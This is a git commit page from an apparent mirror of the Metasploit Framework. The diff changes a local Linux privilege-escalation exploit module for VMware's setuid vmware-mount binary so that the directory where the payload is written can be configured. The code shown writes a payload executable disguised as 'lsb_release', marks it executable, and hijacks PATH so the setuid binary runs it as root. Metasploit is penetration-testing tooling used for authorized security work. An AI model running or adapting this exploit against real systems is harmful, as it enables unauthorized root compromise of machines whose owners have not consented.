infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4277 - vmware-mount configurable directory

bug/bundler_fix
OJ 2014-11-28 08:05:42 +10:00
parent 10a05a393c 985838e999
commit 48904c2d63
No known key found for this signature in database
GPG Key ID: 49EEE7511FAA5749
1 changed files with 9 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/linux/local/vmware_mount.rb
View File

@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
'DisclosureDate' => "Aug 22 2013"
}
))
register_options([
OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
], self.class)
end
def check
@ -68,13 +71,14 @@ class Metasploit4 < Msf::Exploit::Local
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
write_file(lsb_path, generate_payload_exe)
cmd_exec("chmod +x #{lsb_path}")
cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
# Delete it here instead of using FileDropper because the original
# session can clean it up
cmd_exec("rm -f lsb_release")
cmd_exec("rm -f #{lsb_path}")
end
def setuid?(remote_file)